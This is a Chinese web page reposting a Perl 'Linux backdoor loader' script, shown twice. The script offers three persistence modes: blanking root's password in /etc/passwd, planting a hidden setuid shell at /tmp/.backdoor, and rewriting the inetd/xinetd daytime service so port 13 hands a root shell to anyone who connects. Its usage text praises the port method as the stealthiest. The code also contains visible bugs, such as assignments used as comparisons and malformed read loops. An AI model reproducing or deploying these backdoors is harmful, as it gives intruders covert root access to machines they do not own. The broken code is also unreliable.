| 導購 | 订阅 | 在线投稿
分享
 
 
 

用perl写的linux后门加载程序

2008-05-19 06:26:00  編輯來源:互聯網  简体版  手機版  評論  字體: ||
 
  print "++++++++++++++++++++++++++++++++++++linux后门工具+++++++++++++++++++++++++++++++++++\n";

  print "使用说明,有三中模式rushroot,fakebackdoor,和rushport,rushroot是加一个账号到passwd中,用户名是root,密码为空n fakebackdoor是绑定一个shell到/tmp/.backdoor下,运行后直接取得root shell,rushport是绑定端口在daytime服务中\n,有两个版本,一个是针对redhatlinux7.0一下的--rushport1,一个是针对redhatlinux7.0以上的--rushport2.\n一般服务器都不开这个服务,程序自动激活daytime服务,telnet到13端口直接取得rootshell 这种方法隐蔽性相对前两中最好\n,记住要重启daytime服务才能生效\n eg: rush rushroot,程序还有很多可以优化的地方,如果有什么好的改进请email to gaomeigaocuo\@hotmail.com\n by 流氓我一生\n";

  $parameter = @;ARGV[0];

  chomp $parameter;

  if ($parameter = "rushroot")

  {

  &rushroot;

  }

  elsif ($parameter = "fakebackdoor")

  {

  &fakebackdoor;

  }

  elsif($parameter = "rushport")

  {

  &rushport1;

  }

  else ($parameter = "rushport2")

  {

  &rushport2;

  }

  sub rushroot

  {

  open (PWD,"/etc/passwd") || die "cannt find the shadow file!\n";

  while()

  {

  chop;

  $passwd.="$_\n";

  last;

  }

  chomp $passwd;

  if($passwd eq "root:x:0:0:root:/root:/bin/bash")

  {

  $passwd =~s/x//g;

  print "rushroot success!now you can get a rootshell with null passwd";

  }

  else

  {

  print "faild....something wrong....:(((";

  }

  while()

  {

  chomp;

  $passwd1.="$_\n";

  }

  close PWD;

  open (PWD,"/etc/passwd")||die "why?";

  print PWD $passwd;

  print PWD $passwd1;

  }

  sub fakebackdoor

  {

  @cpsh = ("cp", "/bin/sh /tmp/.backdoor");

  @chmod= ("chmod","u+s /tmp/.backdoor");

  system(@cpsh);

  system(@chmod);

  print "success! now you can use ./tmp/.backdoor to get a root shell\n";

  }

  sub rushport1

  {

  open (RH6,"/etc/inetd.d/inetd.conf") || die "cannt find the shadow file!\n"; #这里根据版本不同可自己修改路径

  while()

  {

  chomp;

  $passwd.="$_\n";

  chomp $passwd;

  if ($passwd eq "daytime stream tcp nowait root internal")

  {

  $passwd =~s/root internal/bin\/sh -i/g;

  }

  last;

  close RH6;

  open (RH6,"/etc/inetd.d/inetd.conf")||die "faild...:("; # #这里根据版本不同可自己修改路径

  print RH6 $passwd;

  print "success! now you can telnet romote host at port 13 after reboot the daytime session\n";

  }

  }

  sub rushport2

  {

  open (DAYTIME,"/etc/xinetd.d/daytime") || die "can't open file!";

  $daytime = "service daytime\n {\n disable = no\n server =/bin/sh\n server_agrs = --norc\n id = daytime-stream\n socket_type = stream\n protocol = tcp\n user = root\n wait = no\n }\n";

  print DAYTIME $daytime;

  print "success! now you can telnet romote host at port 13 after reboot the daytime session\n";

  }

  
 
 
 
猜你喜欢
  print "++++++++++++++++++++++++++++++++++++linux后门工具+++++++++++++++++++++++++++++++++++\n";   print "使用说明,有三中模式rushroot,fakebackdoor,和rushport,rushroot是加一个账号到passwd中,用户名是root,密码为空n fakebackdoor是绑定一个shell到/tmp/.backdoor下,运行后直接取得root shell,rushport是绑定端口在daytime服务中\n,有两个版本,一个是针对redhatlinux7.0一下的--rushport1,一个是针对redhatlinux7.0以上的--rushport2.\n一般服务器都不开这个服务,程序自动激活daytime服务,telnet到13端口直接取得rootshell 这种方法隐蔽性相对前两中最好\n,记住要重启daytime服务才能生效\n eg: rush rushroot,程序还有很多可以优化的地方,如果有什么好的改进请email to gaomeigaocuo\@hotmail.com\n by 流氓我一生\n";   $parameter = @;ARGV[0];   chomp $parameter;   if ($parameter = "rushroot")   {   &rushroot;   }   elsif ($parameter = "fakebackdoor")   {   &fakebackdoor;   }   elsif($parameter = "rushport")   {   &rushport1;   }   else ($parameter = "rushport2")   {   &rushport2;   }   sub rushroot   {   open (PWD,"/etc/passwd") || die "cannt find the shadow file!\n";   while()   {   chop;   $passwd.="$_\n";   last;   }   chomp $passwd;   if($passwd eq "root:x:0:0:root:/root:/bin/bash")   {   $passwd =~s/x//g;   print "rushroot success!now you can get a rootshell with null passwd";   }   else   {   print "faild....something wrong....:(((";   }   while()   {   chomp;   $passwd1.="$_\n";   }   close PWD;   open (PWD,"/etc/passwd")||die "why?";   print PWD $passwd;   print PWD $passwd1;   }   sub fakebackdoor   {   @cpsh = ("cp", "/bin/sh /tmp/.backdoor");   @chmod= ("chmod","u+s /tmp/.backdoor");   system(@cpsh);   system(@chmod);   print "success! now you can use ./tmp/.backdoor to get a root shell\n";   }   sub rushport1   {   open (RH6,"/etc/inetd.d/inetd.conf") || die "cannt find the shadow file!\n"; #这里根据版本不同可自己修改路径   while()   {   chomp;   $passwd.="$_\n";   chomp $passwd;   if ($passwd eq "daytime stream tcp nowait root internal")   {   $passwd =~s/root internal/bin\/sh -i/g;   }   last;   close RH6;   open (RH6,"/etc/inetd.d/inetd.conf")||die "faild...:("; # #这里根据版本不同可自己修改路径   print RH6 $passwd;   print "success! now you can telnet romote host at port 13 after reboot the daytime session\n";   }   }   sub rushport2   {   open (DAYTIME,"/etc/xinetd.d/daytime") || die "can't open file!";   $daytime = "service daytime\n {\n disable = no\n server =/bin/sh\n server_agrs = --norc\n id = daytime-stream\n socket_type = stream\n protocol = tcp\n user = root\n wait = no\n }\n";   print DAYTIME $daytime;   print "success! now you can telnet romote host at port 13 after reboot the daytime session\n";   }   
󰈣󰈤
 
 
 
>>返回首頁<<
 
 
 
 
 
 熱帖排行
 
 
王朝网络微信公众号
微信扫码关注本站公众号 wangchaonetcn
 
  免责声明:本文仅代表作者个人观点,与王朝网络无关。王朝网络登载此文出于传递更多信息之目的,并不意味著赞同其观点或证实其描述,其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
© 2005- 王朝網路 版權所有